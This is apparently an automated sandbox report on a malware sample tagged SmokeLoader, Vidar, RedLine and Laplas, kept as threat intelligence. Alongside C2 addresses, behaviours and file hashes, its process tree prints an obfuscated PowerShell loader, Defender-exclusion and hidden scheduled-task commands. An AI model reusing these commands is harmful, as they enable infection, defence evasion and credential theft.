laplas | fc51e907d00e4bc82fda5bfec4b227e5ebf9c5ecce4acebaa24f17ecdfe5ebe8

Analysis

max time kernel
67s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
22-04-2023 21:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

234KB
MD5

068cc6785e0eccc6e37f1dd67ffcf6f0
SHA1

fcfb12625183cad04ce2832f9c29908baa8039dc
SHA256

fc51e907d00e4bc82fda5bfec4b227e5ebf9c5ecce4acebaa24f17ecdfe5ebe8
SHA512

27dd069bd3871277e0527b1e9a12ad99986b7b3e9a0451c3109d64a8280eb1ff169c0e5964b7b0f6306237d6b161bfe5bde7773d6f3d42e5ba84cfba12921cf9
SSDEEP

3072:jPNKDILIsTh2BZxOq5APDiYbNL4pW95hbfp1I:d8sThaxOyAPLbNL42bfp1I

Score

10^/10

laplas redline smokeloader vidar 2234cb18bdcd93ea6f4e5f1473025a81 special sprg backdoor clipper discovery evasion infostealer persistence spyware stealer trojan upx

Malware Config

Extracted

Family

smokeloader

Botnet

sprg

Extracted

Family

smokeloader

Version

2022

http://hoh0aeghwugh2gie.com/

http://hie7doodohpae4na.com/

http://aek0aicifaloh1yo.com/

http://yic0oosaeiy7ahng.com/

http://wa5zu7sekai8xeih.com/

rc4.i32

Extracted

Family

vidar

Version

3.5

Botnet

2234cb18bdcd93ea6f4e5f1473025a81

https://steamcommunity.com/profiles/76561199497218285

https://t.me/tg_duckworld

Attributes

profile_id_v2
2234cb18bdcd93ea6f4e5f1473025a81
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7

Extracted

Family

redline

Botnet

special

176.123.9.142:14845

Attributes

auth_value
bb28ee957fad348ef1dfce97134849bc

Extracted

Family

laplas

http://89.23.97.128

Attributes

api_key
bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

Signatures

Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	13209177496868571162.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	13209177496868571162.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	13209177496868571162.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	E4A8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	42A7.bat.exe

Executes dropped EXE 4 IoCs

pid	Process
4400	E4A8.exe
764	13209177496868571162.exe
4964	42A7.bat.exe
3804	40119698600278112559.exe

Loads dropped DLL 2 IoCs

pid	Process
4400	E4A8.exe
4400	E4A8.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0002000000022cf3-286.dat	upx
behavioral2/files/0x0002000000022cf3-289.dat	upx
behavioral2/files/0x0002000000022cf3-288.dat	upx
behavioral2/memory/3804-290-0x0000000000570000-0x00000000013D4000-memory.dmp	upx
behavioral2/memory/3804-291-0x0000000000570000-0x00000000013D4000-memory.dmp	upx

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	13209177496868571162.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	13209177496868571162.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
764	13209177496868571162.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3312	4400	WerFault.exe	93

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tmp.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tmp.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	E4A8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	E4A8.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3132	timeout.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	126	Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3804	tmp.exe
3804	tmp.exe
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found
3136	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3136	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3804	tmp.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3136	Process not Found
Token: SeCreatePagefilePrivilege	3136	Process not Found
Token: SeShutdownPrivilege	3136	Process not Found
Token: SeCreatePagefilePrivilege	3136	Process not Found
Token: SeShutdownPrivilege	3136	Process not Found
Token: SeCreatePagefilePrivilege	3136	Process not Found
Token: SeDebugPrivilege	4964	42A7.bat.exe
Token: SeShutdownPrivilege	3136	Process not Found
Token: SeCreatePagefilePrivilege	3136	Process not Found
Token: SeShutdownPrivilege	3136	Process not Found
Token: SeCreatePagefilePrivilege	3136	Process not Found
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	4204	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 3136 wrote to memory of 4400	3136	Process not Found	93
PID 3136 wrote to memory of 4400	3136	Process not Found	93
PID 3136 wrote to memory of 4400	3136	Process not Found	93
PID 4400 wrote to memory of 764	4400	E4A8.exe	94
PID 4400 wrote to memory of 764	4400	E4A8.exe	94
PID 3136 wrote to memory of 3656	3136	Process not Found	96
PID 3136 wrote to memory of 3656	3136	Process not Found	96
PID 3656 wrote to memory of 4504	3656	cmd.exe	98
PID 3656 wrote to memory of 4504	3656	cmd.exe	98
PID 4504 wrote to memory of 4964	4504	cmd.exe	100
PID 4504 wrote to memory of 4964	4504	cmd.exe	100
PID 4504 wrote to memory of 4964	4504	cmd.exe	100
PID 4400 wrote to memory of 3804	4400	E4A8.exe	101
PID 4400 wrote to memory of 3804	4400	E4A8.exe	101
PID 3804 wrote to memory of 3816	3804	40119698600278112559.exe	102
PID 3804 wrote to memory of 3816	3804	40119698600278112559.exe	102
PID 4400 wrote to memory of 3352	4400	E4A8.exe	104
PID 4400 wrote to memory of 3352	4400	E4A8.exe	104
PID 4400 wrote to memory of 3352	4400	E4A8.exe	104
PID 3816 wrote to memory of 1524	3816	cmd.exe	108
PID 3816 wrote to memory of 1524	3816	cmd.exe	108
PID 3352 wrote to memory of 3132	3352	cmd.exe	109
PID 3352 wrote to memory of 3132	3352	cmd.exe	109
PID 3352 wrote to memory of 3132	3352	cmd.exe	109
PID 4964 wrote to memory of 2132	4964	42A7.bat.exe	111
PID 4964 wrote to memory of 2132	4964	42A7.bat.exe	111
PID 4964 wrote to memory of 2132	4964	42A7.bat.exe	111
PID 4964 wrote to memory of 4204	4964	42A7.bat.exe	113
PID 4964 wrote to memory of 4204	4964	42A7.bat.exe	113
PID 4964 wrote to memory of 4204	4964	42A7.bat.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3804

C:\Users\Admin\AppData\Local\Temp\E4A8.exe
C:\Users\Admin\AppData\Local\Temp\E4A8.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:4400
- C:\ProgramData\13209177496868571162.exe
  "C:\ProgramData\13209177496868571162.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:764
- - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    3⤵
    PID:4244
- C:\ProgramData\40119698600278112559.exe
  "C:\ProgramData\40119698600278112559.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\40119698600278112559.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3816
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:1524
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E4A8.exe" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3352
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:3132
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 2116
  2⤵
  - Program crash
  PID:3312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\42A7.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\42A7.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Users\Admin\AppData\Local\Temp\42A7.bat.exe
    "C:\Users\Admin\AppData\Local\Temp\42A7.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4964);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2132
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4204
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\42A7')
      4⤵
      PID:1328
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_olTsz' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\olTsz.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      PID:4948
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\olTsz.vbs"
      4⤵
      PID:544
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\olTsz.bat" "
        5⤵
        
        PID:4520
      - C:\Users\Admin\AppData\Roaming\olTsz.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\olTsz.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);
        6⤵
        
        PID:1288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1288);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        7⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\olTsz')
        7⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\m1otqdb1.m51.exe
        
        "C:\Users\Admin\AppData\Local\Temp\m1otqdb1.m51.exe"
        7⤵
        
        PID:1976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1976);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        
        PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4400 -ip 4400
1⤵
PID:4664

C:\Users\Admin\AppData\Local\Temp\D62E.exe
C:\Users\Admin\AppData\Local\Temp\D62E.exe
1⤵
PID:3408
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  PID:5096

C:\Users\Admin\AppData\Local\Temp\A10.exe
C:\Users\Admin\AppData\Local\Temp\A10.exe
1⤵
PID:812

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:896

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:712

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1324

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3252

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3928

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1184

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4352

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5016

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4396

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\13209177496868571162.exe

Filesize
3.0MB

MD5
e81570d802d26df3dde953770c8c9766

SHA1
d8df423343b59f8b53f10722b023622477e5fb31

SHA256
e1290a9463ef7d1d61645b7d3fd3e4a7518023091f85ab4085308f70d437707f

SHA512
1d03bc26a97b4eb680fe9d1996c525e086f6efcb40db2946e7297544a85cd0b6999ac03ed11048dc424631a643ba95a0624865351e86fb76ebc61641c73b7778

Download Submit
C:\ProgramData\13209177496868571162.exe

Filesize
3.0MB

MD5
e81570d802d26df3dde953770c8c9766

SHA1
d8df423343b59f8b53f10722b023622477e5fb31

SHA256
e1290a9463ef7d1d61645b7d3fd3e4a7518023091f85ab4085308f70d437707f

SHA512
1d03bc26a97b4eb680fe9d1996c525e086f6efcb40db2946e7297544a85cd0b6999ac03ed11048dc424631a643ba95a0624865351e86fb76ebc61641c73b7778

Download Submit
C:\ProgramData\13209177496868571162.exe

Filesize
3.0MB

MD5
e81570d802d26df3dde953770c8c9766

SHA1
d8df423343b59f8b53f10722b023622477e5fb31

SHA256
e1290a9463ef7d1d61645b7d3fd3e4a7518023091f85ab4085308f70d437707f

SHA512
1d03bc26a97b4eb680fe9d1996c525e086f6efcb40db2946e7297544a85cd0b6999ac03ed11048dc424631a643ba95a0624865351e86fb76ebc61641c73b7778

Download Submit
C:\ProgramData\40119698600278112559.exe

Filesize
4.3MB

MD5
196a4cdba36b3fe8f82a215732c486b4

SHA1
9186f53143e01b28af100e1000eb443e6afbe292

SHA256
651e80215fee5757287bd028e7cda4a67865f0c6e0cad46c82706bf0e2565478

SHA512
5e0fc394e6cf8ee16f1227ebbb3ef02ad17c0da9bbf1c51ebcec4ca9343d6993305b26bf2f8ab0b326a2af87797a6d75bc2c544bf8503f3d55347d47ec159143

Download Submit
C:\ProgramData\40119698600278112559.exe

Filesize
4.3MB

MD5
196a4cdba36b3fe8f82a215732c486b4

SHA1
9186f53143e01b28af100e1000eb443e6afbe292

SHA256
651e80215fee5757287bd028e7cda4a67865f0c6e0cad46c82706bf0e2565478

SHA512
5e0fc394e6cf8ee16f1227ebbb3ef02ad17c0da9bbf1c51ebcec4ca9343d6993305b26bf2f8ab0b326a2af87797a6d75bc2c544bf8503f3d55347d47ec159143

Download Submit
C:\ProgramData\40119698600278112559.exe

Filesize
4.3MB

MD5
196a4cdba36b3fe8f82a215732c486b4

SHA1
9186f53143e01b28af100e1000eb443e6afbe292

SHA256
651e80215fee5757287bd028e7cda4a67865f0c6e0cad46c82706bf0e2565478

SHA512
5e0fc394e6cf8ee16f1227ebbb3ef02ad17c0da9bbf1c51ebcec4ca9343d6993305b26bf2f8ab0b326a2af87797a6d75bc2c544bf8503f3d55347d47ec159143

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
49ed0b4990308da94975061df73bcec1

SHA1
a3af129458f92851d04546a9fac050539e9abfd1

SHA256
254296775610bc66c4e09653eeefa593357b43efc1c9e7e25510a16dbee78144

SHA512
b50167d1936896847899bee6ef8f9f20b4aac4474199c05e6d750dadab2c2fe7cbd211dd148f0bd81974de1574fff221ed77055f6e997836e43154452229de03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
dc14f72d604f762c1d583f517d2ff362

SHA1
e0067c138b849cbe7db1820c1c31d78531a3154f

SHA256
e5992f2d108a7f83c73dacec3b445076fc558ed8d561fbfc67d3e2f4bc62d6a0

SHA512
